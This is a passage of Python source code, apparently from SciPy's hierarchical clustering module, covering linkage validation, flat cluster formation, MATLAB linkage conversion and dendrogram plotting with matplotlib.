n = Zs[0] + 1
zz = np.zeros((n * (n - 1)) // 2, dtype=np.double)
# Since the C code does not support striding using strides.
# The dimensions are used instead.
Z = _convert_to_double(Z)
_hierarchy.cophenetic_distances(Z, zz, int(n))
if Y is None:
return zz
Y = np.asarray(Y, order='c')
distance.is_valid_y(Y, throw=True, name='Y')
z = zz.mean()
y = Y.mean()
Yy = Y - y
Zz = zz - z
numerator = (Yy * Zz)
denomA = Yy ** 2
denomB = Zz ** 2
c = numerator.sum() / np.sqrt((denomA.sum() * denomB.sum()))
return (c, zz)
def inconsistent(Z, d=2):
"""
Calculates inconsistency statistics on a linkage.
Note: This function behaves similarly to the MATLAB(TM)
inconsistent function.
Parameters
----------
Z : ndarray
The :math:`(n-1)` by 4 matrix encoding the linkage
(hierarchical clustering). See ``linkage`` documentation
for more information on its form.
d : int, optional
The number of links up to `d` levels below each
non-singleton cluster.
Returns
-------
R : ndarray
A :math:`(n-1)` by 5 matrix where the ``i``'th row
contains the link statistics for the non-singleton cluster
``i``. The link statistics are computed over the link
heights for links :math:`d` levels below the cluster
``i``. ``R[i,0]`` and ``R[i,1]`` are the mean and standard
deviation of the link heights, respectively; ``R[i,2]`` is
the number of links included in the calculation; and
``R[i,3]`` is the inconsistency coefficient,
.. math:: \\frac{\\mathtt{Z[i,2]}-\\mathtt{R[i,0]}} {R[i,1]}
"""
Z = np.asarray(Z, order='c')
Zs = Z.shape
is_valid_linkage(Z, throw=True, name='Z')
if (not d == np.floor(d)) or d < 0:
raise ValueError('The second argument d must be a nonnegative '
'integer value.')
# Since the C code does not support striding using strides.
# The dimensions are used instead.
[Z] = _copy_arrays_if_base_present([Z])
n = Zs[0] + 1
R = np.zeros((n - 1, 4), dtype=np.double)
_hierarchy.inconsistent(Z, R, int(n), int(d))
return R
def from_mlab_linkage(Z):
"""
Converts a linkage matrix generated by MATLAB(TM) to a new
linkage matrix compatible with this module.
The conversion does two things:
* the indices are converted from ``1..N`` to ``0..(N-1)`` form,
and
* a fourth column Z[:,3] is added where Z[i,3] is represents the
number of original observations (leaves) in the non-singleton
cluster i.
This function is useful when loading in linkages from legacy data
files generated by MATLAB.
Parameters
----------
Z : ndarray
A linkage matrix generated by MATLAB(TM).
Returns
-------
ZS : ndarray
A linkage matrix compatible with this library.
"""
Z = np.asarray(Z, dtype=np.double, order='c')
Zs = Z.shape
# If it's empty, return it.
if len(Zs) == 0 or (len(Zs) == 1 and Zs[0] == 0):
return Z.copy()
if len(Zs) != 2:
raise ValueError("The linkage array must be rectangular.")
# If it contains no rows, return it.
if Zs[0] == 0:
return Z.copy()
Zpart = Z.copy()
if Zpart[:, 0:2].min() != 1.0 and Zpart[:, 0:2].max() != 2 * Zs[0]:
raise ValueError('The format of the indices is not 1..N')
Zpart[:, 0:2] -= 1.0
CS = np.zeros((Zs[0],), dtype=np.double)
_hierarchy.calculate_cluster_sizes(Zpart, CS, int(Zs[0]) + 1)
return np.hstack([Zpart, CS.reshape(Zs[0], 1)])
def to_mlab_linkage(Z):
"""
Converts a linkage matrix to a MATLAB(TM) compatible one.
Converts a linkage matrix ``Z`` generated by the linkage function
of this module to a MATLAB(TM) compatible one. The return linkage
matrix has the last column removed and the cluster indices are
converted to ``1..N`` indexing.
Parameters
----------
Z : ndarray
A linkage matrix generated by this library.
Returns
-------
to_mlab_linkage : ndarray
A linkage matrix compatible with MATLAB(TM)'s hierarchical
clustering functions.
The return linkage matrix has the last column removed
and the cluster indices are converted to ``1..N`` indexing.
"""
Z = np.asarray(Z, order='c', dtype=np.double)
Zs = Z.shape
if len(Zs) == 0 or (len(Zs) == 1 and Zs[0] == 0):
return Z.copy()
is_valid_linkage(Z, throw=True, name='Z')
ZP = Z[:, 0:3].copy()
ZP[:, 0:2] += 1.0
return ZP
def is_monotonic(Z):
"""
Returns True if the linkage passed is monotonic.
The linkage is monotonic if for every cluster :math:`s` and :math:`t`
joined, the distance between them is no less than the distance
between any previously joined clusters.
Parameters
----------
Z : ndarray
The linkage matrix to check for monotonicity.
Returns
-------
b : bool
A boolean indicating whether the linkage is monotonic.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
# We expect the i'th value to be greater than its successor.
return (Z[1:, 2] >= Z[:-1, 2]).all()
def is_valid_im(R, warning=False, throw=False, name=None):
"""Returns True if the inconsistency matrix passed is valid.
It must be a :math:`n` by 4 numpy array of doubles. The standard
deviations ``R[:,1]`` must be nonnegative. The link counts
``R[:,2]`` must be positive and no greater than :math:`n-1`.
Parameters
----------
R : ndarray
The inconsistency matrix to check for validity.
warning : bool, optional
When True, issues a Python warning if the linkage
matrix passed is invalid.
throw : bool, optional
When True, throws a Python exception if the linkage
matrix passed is invalid.
name : str, optional
This string refers to the variable name of the invalid
linkage matrix.
Returns
-------
b : bool
True if the inconsistency matrix is valid.
"""
R = np.asarray(R, order='c')
valid = True
name_str = "%r " % name if name else ''
try:
if type(R) != np.ndarray:
raise TypeError('Variable %spassed as inconsistency matrix is not '
'a numpy array.' % name_str)
if R.dtype != np.double:
raise TypeError('Inconsistency matrix %smust contain doubles '
'(double).' % name_str)
if len(R.shape) != 2:
raise ValueError('Inconsistency matrix %smust have shape=2 (i.e. '
'be two-dimensional).' % name_str)
if R.shape[1] != 4:
raise ValueError('Inconsistency matrix %smust have 4 columns.' %
name_str)
if R.shape[0] < 1:
raise ValueError('Inconsistency matrix %smust have at least one '
'row.' % name_str)
if (R[:, 0] < 0).any():
raise ValueError('Inconsistency matrix %scontains negative link '
'height means.' % name_str)
if (R[:, 1] < 0).any():
raise ValueError('Inconsistency matrix %scontains negative link '
'height standard deviations.' % name_str)
if (R[:, 2] < 0).any():
raise ValueError('Inconsistency matrix %scontains negative link '
'counts.' % name_str)
except Exception as e:
if throw:
raise
if warning:
_warning(str(e))
valid = False
return valid
def is_valid_linkage(Z, warning=False, throw=False, name=None):
"""
Checks the validity of a linkage matrix.
A linkage matrix is valid if it is a two dimensional
ndarray (type double) with :math:`n`
rows and 4 columns. The first two columns must contain indices
between 0 and :math:`2n-1`. For a given row ``i``,
:math:`0 \\leq \\mathtt{Z[i,0]} \\leq i+n-1`
and :math:`0 \\leq Z[i,1] \\leq i+n-1`
(i.e. a cluster cannot join another cluster unless the cluster
being joined has been generated.)
Parameters
----------
Z : array_like
Linkage matrix.
warning : bool, optional
When True, issues a Python warning if the linkage
matrix passed is invalid.
throw : bool, optional
When True, throws a Python exception if the linkage
matrix passed is invalid.
name : str, optional
This string refers to the variable name of the invalid
linkage matrix.
Returns
-------
b : bool
True iff the inconsistency matrix is valid.
"""
Z = np.asarray(Z, order='c')
valid = True
name_str = "%r " % name if name else ''
try:
if type(Z) != np.ndarray:
raise TypeError('Passed linkage argument %sis not a valid array.' %
name_str)
if Z.dtype != np.double:
raise TypeError('Linkage matrix %smust contain doubles.' % name_str)
if len(Z.shape) != 2:
raise ValueError('Linkage matrix %smust have shape=2 (i.e. be '
'two-dimensional).' % name_str)
if Z.shape[1] != 4:
raise ValueError('Linkage matrix %smust have 4 columns.' % name_str)
if Z.shape[0] == 0:
raise ValueError('Linkage must be computed on at least two '
'observations.')
n = Z.shape[0]
if n > 1:
if ((Z[:, 0] < 0).any() or (Z[:, 1] < 0).any()):
raise ValueError('Linkage %scontains negative indices.' %
name_str)
if (Z[:, 2] < 0).any():
raise ValueError('Linkage %scontains negative distances.' %
name_str)
if (Z[:, 3] < 0).any():
raise ValueError('Linkage %scontains negative counts.' %
name_str)
if _check_hierarchy_uses_cluster_before_formed(Z):
raise ValueError('Linkage %suses non-singleton cluster before '
'it is formed.' % name_str)
if _check_hierarchy_uses_cluster_more_than_once(Z):
raise ValueError('Linkage %suses the same cluster more than once.'
% name_str)
except Exception as e:
if throw:
raise
if warning:
_warning(str(e))
valid = False
return valid
def _check_hierarchy_uses_cluster_before_formed(Z):
n = Z.shape[0] + 1
for i in xrange(0, n - 1):
if Z[i, 0] >= n + i or Z[i, 1] >= n + i:
return True
return False
def _check_hierarchy_uses_cluster_more_than_once(Z):
n = Z.shape[0] + 1
chosen = set([])
for i in xrange(0, n - 1):
if (Z[i, 0] in chosen) or (Z[i, 1] in chosen) or Z[i, 0] == Z[i, 1]:
return True
chosen.add(Z[i, 0])
chosen.add(Z[i, 1])
return False
def _check_hierarchy_not_all_clusters_used(Z):
n = Z.shape[0] + 1
chosen = set([])
for i in xrange(0, n - 1):
chosen.add(int(Z[i, 0]))
chosen.add(int(Z[i, 1]))
must_chosen = set(range(0, 2 * n - 2))
return len(must_chosen.difference(chosen)) > 0
def num_obs_linkage(Z):
"""
Returns the number of original observations of the linkage matrix
passed.
Parameters
----------
Z : ndarray
The linkage matrix on which to perform the operation.
Returns
-------
n : int
The number of original observations in the linkage.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
return (Z.shape[0] + 1)
def correspond(Z, Y):
"""
Checks for correspondence between linkage and condensed distance matrices
They must have the same number of original observations for
the check to succeed.
This function is useful as a sanity check in algorithms that make
extensive use of linkage and distance matrices that must
correspond to the same set of original observations.
Parameters
----------
Z : array_like
The linkage matrix to check for correspondence.
Y : array_like
The condensed distance matrix to check for correspondence.
Returns
-------
b : bool
A boolean indicating whether the linkage matrix and distance
matrix could possibly correspond to one another.
"""
is_valid_linkage(Z, throw=True)
distance.is_valid_y(Y, throw=True)
Z = np.asarray(Z, order='c')
Y = np.asarray(Y, order='c')
return distance.num_obs_y(Y) == num_obs_linkage(Z)
def fcluster(Z, t, criterion='inconsistent', depth=2, R=None, monocrit=None):
"""
Forms flat clusters from the hierarchical clustering defined by
the linkage matrix ``Z``.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded with the matrix returned
by the `linkage` function.
t : float
The threshold to apply when forming flat clusters.
criterion : str, optional
The criterion to use in forming flat clusters. This can
be any of the following values:
``inconsistent`` : If a cluster node and all its
descendants have an inconsistent value less than or equal
to `t` then all its leaf descendants belong to the
same flat cluster. When no non-singleton cluster meets
this criterion, every node is assigned to its own
cluster. (Default)
``distance`` : Forms flat clusters so that the original
observations in each flat cluster have no greater a
cophenetic distance than `t`.
``maxclust`` : Finds a minimum threshold ``r`` so that
the cophenetic distance between any two original
observations in the same flat cluster is no more than
``r`` and no more than `t` flat clusters are formed.
``monocrit`` : Forms a flat cluster from a cluster node c
with index i when ``monocrit[j] <= t``.
For example, to threshold on the maximum mean distance
as computed in the inconsistency matrix R with a
threshold of 0.8 do:
MR = maxRstat(Z, R, 3)
cluster(Z, t=0.8, criterion='monocrit', monocrit=MR)
``maxclust_monocrit`` : Forms a flat cluster from a
non-singleton cluster node ``c`` when ``monocrit[i] <=
r`` for all cluster indices ``i`` below and including
``c``. ``r`` is minimized such that no more than ``t``
flat clusters are formed. monocrit must be
monotonic. For example, to minimize the threshold t on
maximum inconsistency values so that no more than 3 flat
clusters are formed, do:
MI = maxinconsts(Z, R)
cluster(Z, t=3, criterion='maxclust_monocrit', monocrit=MI)
depth : int, optional
The maximum depth to perform the inconsistency calculation.
It has no meaning for the other criteria. Default is 2.
R : ndarray, optional
The inconsistency matrix to use for the 'inconsistent'
criterion. This matrix is computed if not provided.
monocrit : ndarray, optional
An array of length n-1. `monocrit[i]` is the
statistics upon which non-singleton i is thresholded. The
monocrit vector must be monotonic, i.e. given a node c with
index i, for all node indices j corresponding to nodes
below c, `monocrit[i] >= monocrit[j]`.
Returns
-------
fcluster : ndarray
An array of length n. T[i] is the flat cluster number to
which original observation i belongs.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
n = Z.shape[0] + 1
T = np.zeros((n,), dtype='i')
# Since the C code does not support striding using strides.
# The dimensions are used instead.
[Z] = _copy_arrays_if_base_present([Z])
if criterion == 'inconsistent':
if R is None:
R = inconsistent(Z, depth)
else:
R = np.asarray(R, order='c')
is_valid_im(R, throw=True, name='R')
# Since the C code does not support striding using strides.
# The dimensions are used instead.
[R] = _copy_arrays_if_base_present([R])
_hierarchy.cluster_in(Z, R, T, float(t), int(n))
elif criterion == 'distance':
_hierarchy.cluster_dist(Z, T, float(t), int(n))
elif criterion == 'maxclust':
_hierarchy.cluster_maxclust_dist(Z, T, int(n), int(t))
elif criterion == 'monocrit':
[monocrit] = _copy_arrays_if_base_present([monocrit])
_hierarchy.cluster_monocrit(Z, monocrit, T, float(t), int(n))
elif criterion == 'maxclust_monocrit':
[monocrit] = _copy_arrays_if_base_present([monocrit])
_hierarchy.cluster_maxclust_monocrit(Z, monocrit, T, int(n), int(t))
else:
raise ValueError('Invalid cluster formation criterion: %s'
% str(criterion))
return T
def fclusterdata(X, t, criterion='inconsistent',
metric='euclidean', depth=2, method='single', R=None):
"""
Cluster observation data using a given metric.
Clusters the original observations in the n-by-m data
matrix X (n observations in m dimensions), using the euclidean
distance metric to calculate distances between original observations,
performs hierarchical clustering using the single linkage algorithm,
and forms flat clusters using the inconsistency method with `t` as the
cut-off threshold.
A one-dimensional array T of length n is returned. T[i] is the index
of the flat cluster to which the original observation i belongs.
Parameters
----------
X : (N, M) ndarray
N by M data matrix with N observations in M dimensions.
t : float
The threshold to apply when forming flat clusters.
criterion : str, optional
Specifies the criterion for forming flat clusters. Valid
values are 'inconsistent' (default), 'distance', or 'maxclust'
cluster formation algorithms. See `fcluster` for descriptions.
metric : str, optional
The distance metric for calculating pairwise distances. See
`distance.pdist` for descriptions and linkage to verify
compatibility with the linkage method.
depth : int, optional
The maximum depth for the inconsistency calculation. See
`inconsistent` for more information.
method : str, optional
The linkage method to use (single, complete, average,
weighted, median centroid, ward). See `linkage` for more
information. Default is "single".
R : ndarray, optional
The inconsistency matrix. It will be computed if necessary
if it is not passed.
Returns
-------
fclusterdata : ndarray
A vector of length n. T[i] is the flat cluster number to
which original observation i belongs.
Notes
-----
This function is similar to the MATLAB function clusterdata.
"""
X = np.asarray(X, order='c', dtype=np.double)
if type(X) != np.ndarray or len(X.shape) != 2:
raise TypeError('The observation matrix X must be an n by m numpy '
'array.')
Y = distance.pdist(X, metric=metric)
Z = linkage(Y, method=method)
if R is None:
R = inconsistent(Z, d=depth)
else:
R = np.asarray(R, order='c')
T = fcluster(Z, criterion=criterion, depth=depth, R=R, t=t)
return T
def leaves_list(Z):
"""
Returns a list of leaf node ids
The return corresponds to the observation vector index as it appears
in the tree from left to right. Z is a linkage matrix.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. `Z` is
a linkage matrix. See ``linkage`` for more information.
Returns
-------
leaves_list : ndarray
The list of leaf node ids.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
n = Z.shape[0] + 1
ML = np.zeros((n,), dtype='i')
[Z] = _copy_arrays_if_base_present([Z])
_hierarchy.prelist(Z, ML, int(n))
return ML
# Maps number of leaves to text size.
#
# p <= 20, size="12"
# 20 < p <= 30, size="10"
# 30 < p <= 50, size="8"
# 50 < p <= np.inf, size="6"
_dtextsizes = {20: 12, 30: 10, 50: 8, 85: 6, np.inf: 5}
_drotation = {20: 0, 40: 45, np.inf: 90}
_dtextsortedkeys = list(_dtextsizes.keys())
_dtextsortedkeys.sort()
_drotationsortedkeys = list(_drotation.keys())
_drotationsortedkeys.sort()
def _remove_dups(L):
"""
Removes duplicates AND preserves the original order of the elements.
The set class is not guaranteed to do this.
"""
seen_before = set([])
L2 = []
for i in L:
if i not in seen_before:
seen_before.add(i)
L2.append(i)
return L2
def _get_tick_text_size(p):
for k in _dtextsortedkeys:
if p <= k:
return _dtextsizes[k]
def _get_tick_rotation(p):
for k in _drotationsortedkeys:
if p <= k:
return _drotation[k]
def _plot_dendrogram(icoords, dcoords, ivl, p, n, mh, orientation,
no_labels, color_list, leaf_font_size=None,
leaf_rotation=None, contraction_marks=None,
ax=None, above_threshold_color='b'):
# Import matplotlib here so that it's not imported unless dendrograms
# are plotted. Raise an informative error if importing fails.
try:
# if an axis is provided, don't use pylab at all
if ax is None:
import matplotlib.pylab
import matplotlib.patches
import matplotlib.collections
except ImportError:
raise ImportError("You must install the matplotlib library to plot the dendrogram. Use no_plot=True to calculate the dendrogram without plotting.")
if ax is None:
ax = matplotlib.pylab.gca()
# if we're using pylab, we want to trigger a draw at the end
trigger_redraw = True
else:
trigger_redraw = False
# Independent variable plot width
ivw = len(ivl) * 10
# Depenendent variable plot height
dvw = mh + mh * 0.05
ivticks = np.arange(5, len(ivl) * 10 + 5, 10)
if orientation == 'top':
ax.set_ylim([0, dvw])
ax.set_xlim([0, ivw])
xlines = icoords
ylines = dcoords
if no_labels:
ax.set_xticks([])
ax.set_xticklabels([])
else:
ax.set_xticks(ivticks)
ax.set_xticklabels(ivl)
ax.xaxis.set_ticks_position('bottom')
lbls = ax.get_xticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
else:
leaf_rot = float(_get_tick_rotation(len(ivl)))
for lbl in lbls:
lbl.set_rotation(leaf_rot)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
else:
leaf_fs = float(_get_tick_text_size(len(ivl)))
for lbl in lbls:
lbl.set_size(leaf_fs)
# Make the tick marks invisible because they cover up the links
for line in ax.get_xticklines():
line.set_visible(False)
elif orientation == 'bottom':
ax.set_ylim([dvw, 0])
ax.set_xlim([0, ivw])
xlines = icoords
ylines = dcoords
if no_labels:
ax.set_xticks([])
ax.set_xticklabels([])
else:
ax.set_xticks(ivticks)
ax.set_xticklabels(ivl)
lbls = ax.get_xticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
else:
leaf_rot = float(_get_tick_rotation(p))
for lbl in lbls:
lbl.set_rotation(leaf_rot)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
else:
leaf_fs = float(_get_tick_text_size(p))
for lbl in lbls:
lbl.set_size(leaf_fs)
ax.xaxis.set_ticks_position('top')
# Make the tick marks invisible because they cover up the links
for line in ax.get_xticklines():
line.set_visible(False)
elif orientation == 'left':
ax.set_xlim([0, dvw])
ax.set_ylim([0, ivw])
xlines = dcoords
ylines = icoords
if no_labels:
ax.set_yticks([])
ax.set_yticklabels([])
else:
ax.set_yticks(ivticks)
ax.set_yticklabels(ivl)
lbls = ax.get_yticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
ax.yaxis.set_ticks_position('left')
# Make the tick marks invisible because they cover up the
# links
for line in ax.get_yticklines():
line.set_visible(False)
elif orientation == 'right':
ax.set_xlim([dvw, 0])
ax.set_ylim([0, ivw])
xlines = dcoords
ylines = icoords
if no_labels:
ax.set_yticks([])
ax.set_yticklabels([])
else:
ax.set_yticks(ivticks)
ax.set_yticklabels(ivl)
lbls = ax.get_yticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
ax.yaxis.set_ticks_position('right')
# Make the tick marks invisible because they cover up the links
for line in ax.get_yticklines():
line.set_visible(False)
# Let's use collections instead. This way there is a separate legend
# item for each tree grouping, rather than stupidly one for each line
# segment.
colors_used = _remove_dups(color_list)
color_to_lines = {}
for color in colors_used:
color_to_lines[color] = []
for (xline, yline, color) in zip(xlines, ylines, color_list):
color_to_lines[color].append(list(zip(xline, yline)))
colors_to_collections = {}
# Construct the collections.
for color in colors_used:
coll = matplotlib.collections.LineCollection(color_to_lines[color],
colors=(color,))
colors_to_collections[color] = coll
# Add all the groupings below the color threshold.
for color in colors_used:
if color != above_threshold_color:
ax.add_collection(colors_to_collections[color])
# If there is a grouping of links above the color threshold,
# it should go last.
if above_threshold_color in colors_to_collections:
ax.add_collection(colors_to_collections[above_threshold_color])
if contraction_marks is not None:
if orientation in ('left', 'right'):
for (x, y) in contraction_marks:
e = matplotlib.patches.Ellipse((y, x),
width=dvw / 100, height=1.0)
ax.add_artist(e)
e.set_clip_box(ax.bbox)
e.set_alpha(0.5)
e.set_facecolor('k')
if orientation in ('top', 'bottom'):
for (x, y) in contraction_marks:
e = matplotlib.patches.Ellipse((x, y),
width=1.0, height=dvw / 100)
ax.add_artist(e)
e.set_clip_box(ax.bbox)
e.set_alpha(0.5)
e.set_facecolor('k')
if trigger_redraw:
matplotlib.pylab.draw_if_interactive()
_link_line_colors = ['g', 'r', 'c', 'm', 'y', 'k']
def set_link_color_palette(palette):
"""
Set list of matplotlib color codes for dendrogram color_threshold.
Parameters
----------
palette : list
A list of matplotlib color codes. The order of
the color codes is the order in which the colors are cycled
through when color thresholding in the dendrogram.
"""
if type(palette) not in (list, tuple):
raise TypeError("palette must be a list or tuple")
_ptypes = [isinstance(p, string_types) for p in palette]
if False in _ptypes:
raise TypeError("all palette list elements must be color strings")
for i in list(_link_line_colors):
_link_line_colors.remove(i)
_link_line_colors.extend(list(palette))
def dendrogram(Z, p=30, truncate_mode=None, color_threshold=None,
get_leaves=True, orientation='top', labels=None,
count_sort=False, distance_sort=False, show_leaf_counts=True,
no_plot=False, no_labels=False, color_list=None,
leaf_font_size=None, leaf_rotation=None, leaf_label_func=None,
no_leaves=False, show_contracted=False,
link_color_func=None, ax=None, above_threshold_color='b'):
"""
Plots the hierarchical clustering as a dendrogram.
The dendrogram illustrates how each cluster is
composed by drawing a U-shaped link between a non-singleton
cluster and its children. The height of the top of the U-link is
the distance between its children clusters. It is also the
cophenetic distance between original observations in the two
children clusters. It is expected that the distances in Z[:,2] be
monotonic, otherwise crossings appear in the dendrogram.
Parameters
----------
Z : ndarray
The linkage matrix encoding the hierarchical clustering to
render as a dendrogram. See the ``linkage`` function for more
information on the format of ``Z``.
p : int, optional
The ``p`` parameter for ``truncate_mode``.
truncate_mode : str, optional
The dendrogram can be hard to read when the original
observation matrix from which the linkage is derived is
large. Truncation is used to condense the dendrogram. There
are several modes:
``None/'none'``
No truncation is performed (Default).
``'lastp'``
The last ``p`` non-singleton formed in the linkage are the only
non-leaf nodes in the linkage; they correspond to rows
``Z[n-p-2:end]`` in ``Z``. All other non-singleton clusters are
contracted into leaf nodes.
``'mlab'``
This corresponds to MATLAB(TM) behavior. (not implemented yet)
``'level'/'mtica'``
No more than ``p`` levels of the dendrogram tree are displayed.
This corresponds to Mathematica(TM) behavior.
color_threshold : double, optional
For brevity, let :math:`t` be the ``color_threshold``.
Colors all the descendent links below a cluster node
:math:`k` the same color if :math:`k` is the first node below
the cut threshold :math:`t`. All links connecting nodes with
distances greater than or equal to the threshold are colored
blue. If :math:`t` is less than or equal to zero, all nodes
are colored blue. If ``color_threshold`` is None or
'default', corresponding with MATLAB(TM) behavior, the
threshold is set to ``0.7*max(Z[:,2])``.
get_leaves : bool, optional
Includes a list ``R['leaves']=H`` in the result
dictionary. For each :math:`i`, ``H[i] == j``, cluster node
``j`` appears in position ``i`` in the left-to-right traversal
of the leaves, where :math:`j < 2n-1` and :math:`i < n`.
orientation : str, optional
The direction to plot the dendrogram, which can be any
of the following strings:
``'top'``
Plots the root at the top, and plot descendent links going downwards.
(default).
``'bottom'``
Plots the root at the bottom, and plot descendent links going
upwards.
``'left'``
Plots the root at the left, and plot descendent links going right.
``'right'``
Plots the root at the right, and plot descendent links going left.
labels : ndarray, optional
By default ``labels`` is None so the index of the original observation
is used to label the leaf nodes. Otherwise, this is an :math:`n`
-sized list (or tuple). The ``labels[i]`` value is the text to put
under the :math:`i` th leaf node only if it corresponds to an original
observation and not a non-singleton cluster.
count_sort : str or bool, optional
For each node n, the order (visually, from left-to-right) n's
two descendent links are plotted is determined by this
parameter, which can be any of the following values:
``False``
Nothing is done.
``'ascending'`` or ``True``
The child with the minimum number of original objects in its cluster
is plotted first.
``'descendent'``
The child with the maximum number of original objects in its cluster
is plotted first.
Note ``distance_sort`` and ``count_sort`` cannot both be True.
distance_sort : str or bool, optional
For each node n, the order (visually, from left-to-right) n's
two descendent links are plotted is determined by this
parameter, which can be any of the following values:
``False``
Nothing is done.
``'ascending'`` or ``True``
The child with the minimum distance between its direct descendents is
plotted first.
``'descending'``
The child with the maximum distance between its direct descendents is
plotted first.
Note ``distance_sort`` and ``count_sort`` cannot both be True.
show_leaf_counts : bool, optional
When True, leaf nodes representing :math:`k>1` original
observation are labeled with the number of observations they
contain in parentheses.
no_plot : bool, optional
When True, the final rendering is not performed. This is
useful if only the data structures computed for the rendering
are needed or if matplotlib is not available.
no_labels : bool, optional
When True, no labels appear next to the leaf nodes in the
rendering of the dendrogram.
leaf_rotation : double, optional
Specifies the angle (in degrees) to rotate the leaf
labels. When unspecified, the rotation is based on the number of
nodes in the dendrogram (default is 0).
leaf_font_size : int, optional
Specifies the font size (in points) of the leaf labels. When
unspecified, the size based on the number of nodes in the
dendrogram.
leaf_label_func : lambda or function, optional
When leaf_label_func is a callable function, for each
leaf with cluster index :math:`k < 2n-1`. The function
is expected to return a string with the label for the
leaf.
Indices :math:`k < n` correspond to original observations
while indices :math:`k \\geq n` correspond to non-singleton
clusters.
For example, to label singletons with their node id and
non-singletons with their id, count, and inconsistency
coefficient, simply do::
# First define the leaf label function.
def llf(id):
if id < n:
return str(id)
else:
return '[%d %d %1.2f]' % (id, count, R[n-id,3])
# The text for the leaf nodes is going to be big so force
# a rotation of 90 degrees.
dendrogram(Z, leaf_label_func=llf, leaf_rotation=90)
show_contracted : bool, optional
When True the heights of non-singleton nodes contracted
into a leaf node are plotted as crosses along the link
connecting that leaf node. This really is only useful when
truncation is used (see ``truncate_mode`` parameter).
link_color_func : callable, optional
If given, `link_color_function` is called with each non-singleton id
corresponding to each U-shaped link it will paint. The function is
expected to return the color to paint the link, encoded as a matplotlib
color string code. For example::
dendrogram(Z, link_color_func=lambda k: colors[k])
colors the direct links below each untruncated non-singleton node
``k`` using ``colors[k]``.
ax : matplotlib Axes instance, optional
If None and `no_plot` is not True, the dendrogram will be plotted
on the current axes. Otherwise if `no_plot` is not True the
dendrogram will be plotted on the given ``Axes`` instance. This can be
useful if the dendrogram is part of a more complex figure.
above_threshold_color : str, optional
This matplotlib color string sets the color of the links above the
color_threshold. The default is 'b'.
Returns
-------
R : dict
A dictionary of data structures computed to render the
dendrogram. Its has the following keys:
``'color_list'``
A list of color names. The k'th element represents the color of the
k'th link.
``'icoord'`` and ``'dcoord'``
Each of them is a list of lists. Let ``icoord = [I1, I2, ..., Ip]``
where ``Ik = [xk1, xk2, xk3, xk4]`` and ``dcoord = [D1, D2, ..., Dp]``
where ``Dk = [yk1, yk2, yk3, yk4]``, then the k'th link painted is
``(xk1, yk1)`` - ``(xk2, yk2)`` - ``(xk3, yk3)`` - ``(xk4, yk4)``.
``'ivl'``
A list of labels corresponding to the leaf nodes.
``'leaves'``
For each i, ``H[i] == j``, cluster node ``j`` appears in position
``i`` in the left-to-right traversal of the leaves, where
:math:`j < 2n-1` and :math:`i < n`. If ``j`` is less than ``n``, the
``i``-th leaf node corresponds to an original observation.
Otherwise, it corresponds to a non-singleton cluster.
"""
# Features under consideration.
#
# ... = dendrogram(..., leaves_order=None)
#
# Plots the leaves in the order specified by a vector of
# original observation indices. If the vector contains duplicates
# or results in a crossing, an exception will be thrown. Passing
# None orders leaf nodes based on the order they appear in the
# pre-order traversal.
Z = np.asarray(Z, order='c')
if orientation not in ["top", "left", "bottom", "right"]:
raise ValueError("orientation must be one of 'top', 'left', "
"'bottom', or 'right'")
is_valid_linkage(Z, throw=True, name='Z')
Zs = Z.shape
n = Zs[0] + 1
if type(p) in (int, float):
p = int(p)
else:
raise TypeError('The second argument must be a number')
if truncate_mode not in ('lastp', 'mlab', 'mtica', 'level', 'none', None):
raise ValueError('Invalid truncation mode.')
if truncate_mode == 'lastp' or truncate_mode == 'mlab':
if p > n or p == 0:
p = n
if truncate_mode == 'mtica' or truncate_mode == 'level':
if p <= 0:
p = np.inf
if get_leaves:
lvs = []
else:
lvs = None
icoord_list = []
dcoord_list = []
color_list = []
current_color = [0]
currently_below_threshold = [False]
if no_leaves:
ivl = None
else:
ivl = []
if color_threshold is None or \
(isinstance(color_threshold, string_types) and
color_threshold == 'default'):
color_threshold = max(Z[:, 2]) * 0.7
R = {'icoord': icoord_list, 'dcoord': dcoord_list, 'ivl': ivl,
'leaves': lvs, 'color_list': color_list}
if show_contracted:
contraction_marks = []
else:
contraction_marks = None
_dendrogram_calculate_info(
Z=Z, p=p,
truncate_mode=truncate_mode,
color_threshold=color_threshold,
get_leaves=get_leaves,
orientation=orientation,
labels=labels,
count_sort=count_sort,
distance_sort=distance_sort,
show_leaf_counts=show_leaf_counts,
i=2 * n - 2, iv=0.0, ivl=ivl, n=n,
icoord_list=icoord_list,
dcoord_list=dcoord_list, lvs=lvs,
current_color=current_color,
color_list=color_list,
currently_below_threshold=currently_below_threshold,
leaf_label_func=leaf_label_func,
contraction_marks=contraction_marks,
link_color_func=link_color_func,
above_threshold_color=above_threshold_color)
if not no_plot:
mh = max(Z[:, 2])
_plot_dendrogram(icoord_list, dcoord_list, ivl, p, n, mh, orientation,
no_labels, color_list,
leaf_font_size=leaf_font_size,
leaf_rotation=leaf_rotation,
contraction_marks=contraction_marks,
ax=ax,
above_threshold_color=above_threshold_color)
return R
def _append_singleton_leaf_node(Z, p, n, level, lvs, ivl, leaf_label_func,
i, labels):
# If the leaf id structure is not None and is a list then the caller
# to dendrogram has indicated that cluster id's corresponding to the
# leaf nodes should be recorded.
if lvs is not None:
lvs.append(int(i))
# If leaf node labels are to be displayed...
if ivl is not None:
# If a leaf_label_func has been provided, the label comes from the
# string returned from the leaf_label_func, which is a function
# passed to dendrogram.
if leaf_label_func:
ivl.append(leaf_label_func(int(i)))
else:
# Otherwise, if the dendrogram caller has passed a labels list
# for the leaf nodes, use it.
if labels is not None:
ivl.append(labels[int(i - n)])
else:
